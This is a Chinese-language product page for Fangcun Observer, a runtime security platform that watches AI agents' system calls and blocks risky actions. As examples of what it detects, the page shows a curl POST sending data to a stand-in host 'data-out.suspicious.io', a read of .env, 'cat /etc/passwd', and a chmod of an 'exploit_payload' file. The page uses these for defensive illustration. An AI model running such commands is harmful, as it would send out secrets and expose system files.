execve · openat · connect统一捕获系统命令、文件访问和出站连接。framework agnostic不绑定 LangChain、LangGraph、Codex 或自研 runtime。面向企业级 Agent 运行环境的安全观测与主动防御平台。 Fangcun Observer 在 OS / Runtime 层持续还原 Agent 的真实行为, 将模型决策、工具调用、系统副作用与策略处置沉淀为可审计、可追溯、可干预的安全证据链。
execve · openat · connect统一捕获系统命令、文件访问和出站连接。framework agnostic不绑定 LangChain、LangGraph、Codex 或自研 runtime。no SDK hook无需改造 Prompt、工具注册或模型调用链路。runtime scope按进程树、工作区和 Agent 会话归因。LLM call → side effect关联每次模型调用后的运行时副作用。multi-agent path追踪风险如何在多 Agent 协作链路中传播。Notify · Pause · Block按风险级别采取不同运行时处置。before side effect高后果动作在落地前被策略截断。local audit store审计、证据和复核结果留在组织边界内。behavior baseline从真实运行数据持续校准策略权重。Agent 生态中的 harness、框架与模型供应商会持续变化。Observer 直接在 OS / Runtime 层捕获实际副作用, 不依赖 LangChain、LangGraph、Codex、自研工具注册或 SDK hook,使安全观测能力与上层技术栈保持解耦。
execve("/usr/bin/python3", ...)
Agent 启动 formatter,runtime 记录完整命令、父子进程与工作目录。
openat(".env", O_RDONLY)
敏感文件读取不依赖应用埋点,直接由文件系统行为归因。
connect("data-out.suspicious.io:443")
出站连接和目标域名进入同一条 Agent 时间线。
clone() → pid 28492
子进程、脚本和 shell 链路自动归入同一个会话。
接入过程不需要修改业务代码、Prompt 或工具定义。Agent 不感知观测存在, 企业获得的是运行时真实行为记录,而非可被选择性呈现的应用层日志,从根本上压缩 sandbagging 与 deception 空间。
task = planner.next()
result = tools.run(task)
writer.save(result)
# no SDK hook
# no prompt wrapper
高风险事件往往不是单一命令,而是由上下文、协作路径与后续 side effect 共同构成的行为序列。 Observer 把 LLM context、Agent action、runtime side effect 和 incident 关联成完整图谱。
主动防御不应停留在事后复盘。Observer 在危险命令、敏感文件访问、 异常网络连接和越权持久化 产生 side effect 之前 完成策略研判,并执行通知、暂停或阻断。
curl -X POST https://data-out.suspicious.ioblocked before network side effectcat /etc/passwdsensitive file policychmod 0777 /tmp/exploit_payload.pyprivilege escalation pattern所有观测、审计和 incident 数据都可以在组织边界内沉淀。随着真实运行数据增加, Observer 会形成组织专属的 Agent 行为基线,将静态规则升级为持续校准的防御策略。